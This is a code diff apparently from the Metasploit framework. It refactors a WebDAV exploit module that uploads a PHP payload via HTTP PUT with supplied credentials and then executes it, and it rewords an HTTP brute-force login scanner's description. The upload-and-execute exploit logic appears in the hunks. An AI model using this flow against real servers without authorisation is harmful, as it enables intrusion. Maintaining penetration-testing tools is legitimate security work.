WebDAV: MR feedback

modules/auxiliary/scanner/http/http_login.rb

@@ -20,7 +20,7 @@ class MetasploitModule < Msf::Auxiliary
         This module attempts to authenticate to HTTP services that
         require Basic, Digest, or WebDAV authentication.
         It will probe URIs to identify endpoints requiring authentication (HTTP 401)
-        and then perform brute-force the login.
+        and then perform brute-force login attempts.
       },
       'Author' => [ 'hdm' ],
       'References' => [

modules/exploits/multi/http/webdav_upload_php.rb

@@ -13,14 +13,14 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Deprecated
   moved_from 'exploits/windows/http/xampp_webdav_upload_php'
 
-  def initialize
+  def initialize(_info = {})
     super(
       'Name' => 'WebDAV PHP Upload',
       'Description' => %q{
-          This module exploits weak WebDAV passwords, which may be
-          on a on XAMPP server.
-          It uses supplied credentials to upload a PHP payload and
-          execute it.
+          This module exploits WebDAV which also has PHP enabled,
+          such as found on XAMPP servers.
+          It can use do by using any supplied credentials to upload via WebDAV,
+          a PHP payload and then execute it.
       },
       'Author' => [
         'theLightCosine',
@@ -69,13 +69,13 @@ class MetasploitModule < Msf::Exploit::Remote
   def print_res_code(res, res_creds)
     if res.code == 401
       print_warning 'Creds may be required' if res_creds.empty?
-      print_warning 'Creds may be incorrect'  if !res_creds.empty?
+      print_warning 'Creds may be incorrect' if !res_creds.empty?
     end
   end
 
   def report_webdav_service(res, creds)
-    header_server = res.headers['Server']
-    vprint_status "Server: #{header_server.strip}"
+    header_server = res.headers['Server'].to_s.strip
+    vprint_status "Server: #{header_server}"
 
     opts = {
       ip: rhost,
@@ -106,6 +106,10 @@ class MetasploitModule < Msf::Exploit::Remote
       }
     )
 
+    [opts, service]
+  end
+
+  def report_webdav_creds(opts, service)
     # XXXX Otherwise `vuln`'s "Service" is "none" when doing check(), and different when doing exploit()
     report_vuln(
       host: opts[:ip],
@@ -160,7 +164,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     # Record results!
-    report_webdav_service(res, res_creds)
+    opts, service = report_webdav_service(res, res_creds)
 
     # First see if it already exists (it really shouldn't)
     vprint_status "Checking for test file: #{test_url}"
@@ -168,11 +172,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => test_url
     }.merge(res_creds), 10)
     return Exploit::CheckCode::Unknown unless res
-
-    unless res.code == 404
-      print_error "The test file may already exists (HTTP #{res.code})"
-      return Exploit::CheckCode::Unknown # Need to try again with a different file
-    end
+    return Exploit::CheckCode::Unknown("The test file may already exists (HTTP #{res.code})") unless res.code == 404 # Need to try again with a different file
 
     # Try to create it
     vprint_status "Attempting to upload: #{test_url}"
@@ -183,24 +183,24 @@ class MetasploitModule < Msf::Exploit::Remote
     }.merge(res_creds), 10)
     return Exploit::CheckCode::Unknown unless res
 
-    unless res.code == 201
-      print_error "Error with upload request (HTTP #{res.code}, should be 201)"
+    ## Often its HTTP 201
+    unless res.code.to_i.between?(200, 299)
+      print_error "Error with upload request (HTTP #{res.code}, should be 2xx)"
       print_res_code(res, res_creds)
       return Exploit::CheckCode::Safe
     end
 
+    # Record results!
+    report_webdav_creds(opts, service)
+
     # Try to run it
     vprint_status "Checking if created: #{test_url}"
     res = send_request_cgi({
       'uri' => test_url
     }.merge(res_creds))
     return Exploit::CheckCode::Unknown unless res
-
-    unless res.code.to_i.between?(200, 299)
-      print_error "Error with exploit request (HTTP #{res.code}, should be 2xx)"
-      print_error "Error with exploit request (Response doesn't match payload) - Missing PHP?" unless res.body.match(payload)
-      return Exploit::CheckCode::Safe
-    end
+    return Exploit::CheckCode::Safe("Error with exploit request (HTTP #{res.code}, should be 2xx)") unless res.code.to_i.between?(200, 299)
+    return Exploit::CheckCode::Safe("Error with exploit request (Response doesn't match payload) - Missing PHP?") unless res.body.to_s.include?(payload)
 
     # Clean up
     vprint_status "Attempting to delete: #{test_url}"
@@ -227,11 +227,12 @@ class MetasploitModule < Msf::Exploit::Remote
       'method' => 'PUT',
       'data' => payload.raw
     }.merge(res_creds), 10)
-    unless (res && (res.code == 201))
+    ## Often its HTTP 201
+    unless res&.code&.between?(200, 299)
       print_error 'Failed to upload file!'
 
       if res
-        print_error "Error with upload request (HTTP #{res.code}, should be 201)"
+        print_error "Error with upload request (HTTP #{res.code}, should be 2xx)"
         print_res_code(res, res_creds)
       else
         print_error 'No response received from server'
@@ -240,7 +241,9 @@ class MetasploitModule < Msf::Exploit::Remote
       return
     end
 
-    report_webdav_service(res, res_creds)
+    # Record results!
+    opts, service = report_webdav_service(res, res_creds)
+    report_webdav_creds(opts, service)
 
     print_status 'Attempting to execute payload'
     # Very short timeout because the request may never return if we're sending a socket payload